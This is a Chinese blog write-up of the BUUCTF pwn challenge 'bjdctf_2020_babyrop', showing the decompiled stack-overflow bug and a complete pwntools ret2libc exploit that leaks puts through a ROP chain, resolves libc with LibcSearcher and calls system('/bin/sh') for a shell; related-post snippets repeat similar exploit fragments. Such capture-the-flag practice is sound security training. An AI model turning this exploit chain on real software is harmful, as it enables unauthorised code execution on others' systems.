bjdctf_2020_babyrop【BUUCTF】

最新推荐文章于 2023-12-17 18:22:17 发布
最新推荐文章于 2023-12-17 18:22:17 发布
阅读量306 收藏 1
点赞数
分类专栏: CTF训练 Linux PWN 文章标签: 安全 PWN linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696518/article/details/126625445
版权
CTF训练 同时被 3 个专栏收录
46 篇文章 14 订阅
订阅专栏
Linux
37 篇文章 0 订阅
订阅专栏
PWN
37 篇文章 3 订阅
订阅专栏

在这里插入图片描述
开启NX,64位,动态编译,IDA分析

int __cdecl main(int argc, const char **argv, const char **envp)
{
  init(argc, argv, envp);
  vuln();
  return 0;
}
ssize_t vuln()
{
  char buf[32]; // [rsp+0h] [rbp-20h] BYREF

  puts("Pull up your sword and tell me u story!");
  return read(0, buf, 0x64uLL);
}

又是一道栈溢出,找system和“bin/sh",那就直接上exp吧

from pwn import *
from LibcSearcher import *
context.log_level = True
# io = process("./ciscn_2019_ne_5")
io = remote("node4.buuoj.cn",25877)
elf = ELF("./bjdctf_2020_babyrop")
vuln_addr = elf.symbols["vuln"]
put_plt = elf.plt["puts"]
put_got = elf.got["puts"]
main_addr = elf.symbols["main"]
pop_rdi_ret = 0x400733
payload = b'A'*(0x20+8) + p64(pop_rdi_ret) + p64(put_got) + p64(put_plt) + p64(vuln_addr)
io.sendlineafter("story!\n",payload)

put_addr = u64(io.recv(6).ljust(8,b"\x00"))
log.debug("put_addr: "+ hex(put_addr))
libc = LibcSearcher("puts",put_addr)
libc_base = put_addr - libc.dump("puts")
system_addr = libc_base + libc.dump("system")
str_bin_sh = libc_base + libc.dump("str_bin_sh")
payload = b'A'*(0x20+8) + p64(pop_rdi_ret) + p64(str_bin_sh) + p64(system_addr) + p64(vuln_addr)
io.sendlineafter("story!\n",payload)
io.interactive()
Mokapeng
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bjdctf_2020_babyrop
m0_52231248的博客
11-15 877
bjdctf_2020_babyrop Ubuntu16 Checksec: Ida: 标准的ret2libc,有puts函数,offest=0x28 Exp: from pwn import * from LibcSearcher import * context(log_level='debug') p = remote("node4.buuoj.cn",26832) elf = ELF('./bjdctf_2020_babyrop') read_got = elf.got['re
【CTF】bjdctf_2020_babyrop
凉水的博客
06-18 668
bjdctf_2020_babyrop
[BJDCTF 2020]babyrop
最新发布
沈理大学牲的博客
12-17 259
puts_add = u64(i.recv(6).ljust(8,b'\x00'))用来接收plt表中的puts的真实地址的。提醒一下,elf.ELF是()不是[]不难,按照以往的就可以。
BUU刷题(三)
playmaker的博客
03-13 894
BUU刷题(三) fm from pwn import * context.log_level='debug' p=process('./fm') p=remote("node3.buuoj.cn","27782") payload=p32(0x0804a02c)+'%11$n' p.sendline(payload) p.interactive() others_shellcode 拿到题目直...
亚信java笔试题-BJDCTF2020_March:本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、江苏大学、湖南
06-03
BJDCTF2020_March 本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、 江苏大学、湖南工业大学(排名不分先后)联合举办 Notes:web题目easyaspnet需要在windows server 2016 docker native ...
justCTF-2020:justCTF 2020
05-24
justCTF-2020 justCTF 2020 和彩云分流: 链接: 提取码:GqUZ
BJDCTF 2nd writeup(二)
01-21
文章目录Misc[BJDCTF 2nd]A_Beautiful_Picture[BJDCTF 2nd]小姐姐-y1ng[BJDCTF 2nd]TARGZ-y1ng[BJDCTF 2nd]Imagin – 开场曲Crypto[BJDCTF 2nd]cat_flag[BJDCTF 2nd]燕言燕语[BJDCTF 2nd]Y1nglish Misc [BJDCTF 2nd]...
BJDCTF-writeup
01-20
本篇文章为个人做题时的部分wp,如有错误,请联系我更正。 目录杂项最简单的misc-y1ngA_Beautiful_Picture小姐姐-y1ngEasyBaBa圣火昭昭-y1ngTARGZ-y1ngReal_EasyBaBa总结 杂项 最简单的misc-y1ng ...
[BUUOJ]bjdctf_2020_babyrop
Do1phln的博客
10-24 395
先checksec,64位小端序,MX保护开,其它全关,接着进入IDA分析main函数内很简单,进一步分析后找到关键函数vuln本题没有找到backdoor,所以应该是做基地址泄露然后getshell,整个程序内只有puts函数可以输出内容,因此对puts函数进行修改,先溢出后转到此处,考虑到系统会对堆栈进行平衡,所以我们要修改puts的参数需要先进行一次pop保证堆栈平衡,因此使用ROPgadget先找到符合我们条件的ROPputs_got是puts函数的got表项地址,里面装的是puts的真实地址。使用
Flex资料,关于Flex的基础资料
08-25
关于Flex的入门基础资料,详细介绍了Flex的开发,是一部难得的Flex教程
[BUUCTF]PWN——bjdctf_2020_babyrop
mcmuyanga的博客
10-07 2778
bjdctf_2020_babyrop[64位libc泄露] 题目附件 解题步骤: 例行检查,64位程序,开启了NX保护 试运行一下程序,看看大概的情况,看提示,应该是道泄露libc的题目 64位ida载入,shift+f12检索程序里的字符串,没有找到可以直接使用的system(’/bin/sh’) 从main函数开始看程序 main函数调用了一个vuln函数 buf的大小是0x20,read读入的长度是0x64,明显的溢出漏洞 根据已有的信息和得到的提示,是一道64位的libc泄露 利用思路:
bjdctf_2020_babyrop2
qq_33010875的博客
09-26 328
环境:WSL2,ubuntu16.04,python2 checksec文件: PIE保护没开,构造rop链 存在Canary,需要找出Canary的值才能进行地址泄露 文件拖入ida: 在gift函数发现printf格式化漏洞,可以利用该漏洞获取Canary的值,但需要找出输入点参数在栈上的相对位置(找偏移量) 由于scanf限制了只能输入6个字符,因此不能用 AAAA %x %x %x....... 来泄露值,改为: aa%6$p #6是一步步试出来的,可以从1开始尝试,p是十六进制形式 结
pwn7第七关
qq_18823653的博客
04-03 377
前面几个懒得写了,直接第七个吧,溢出点和前面一样get()函数,112字节,保护只开了NX程序本身没有system(),也没有/bin/sh,且栈不可执行,用ROPgadget也没找到有用的语句,但是程序是动态链接的,运行时会加载so库,可以用put()泄露出put的真实地址,又因为ASLR随机化不了地址底12位,可以用put真实地址的底12位查询加载的那个版本的libc.so,以及确定libc的...
[CTF]bjdctf_2020_babyrop2
m0_50819561的博客
10-07 375
格式化字符串漏洞+金丝雀绕过。 出现这种形式的,v2就是canary。 查看他在栈里的位置。 var_8就是canary。 利用格式化字符串漏洞。 %6$p表示输出第六个参数。 发现我们输入的东西在第六个参数的位置。 调试之后发现有一串随机的十六进制数字。这就是canary。由此可见,这个canary在第七个参数的位置。 于是我们先用格式话字符串泄露第七个参数位置上的内容,每一次进行栈溢出的时候把泄露出来的值填入即可。 代码如下: from pwn import * from LibcSearche
BUU刷题-Pwn-bjdctf_2020_babyrop
一个啥也不会的小菜鸡!
06-21 61
[LibcSearcher的使用]]一个简单的栈溢出构造ROP链!
bjdctf_2020_babyropbjdctf_2020_babyrop2(格式化字符leak)
beaster1的博客
04-06 422
bjdctf_2020_babyrop 先checksec 打开ida正常查看函数 打开init函数发现puts函数 然后进入vuln函数 存在栈溢出 没有看到后门函数应该是libc leak+rop 代码如下 from pwn import* from LibcSearcher import* p=remote('node3.buuoj.cn',29901) #p=process('') elf=ELF('bjdctf_2020_babyrop') puts_got=elf.got['puts'] p
[BJDCTF2020]RSA
08-11
RSA(Rivest-Shamir-Adleman)是一种非对称加密算法,常用于数据加密和数字签名。它基于两个大素数的乘积作为公钥的一部分,并使用这两个素数的乘积作为私钥的一部分。RSA算法的安全性基于大数分解的难度,即将一个大数分解为其素数因子的难度。 在BJDCTF2020中,RSA可能是一个题目或者提到的某个技术细节。若有具体问题或需要更多信息,请提供详细内容以便我能够帮助你更好。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值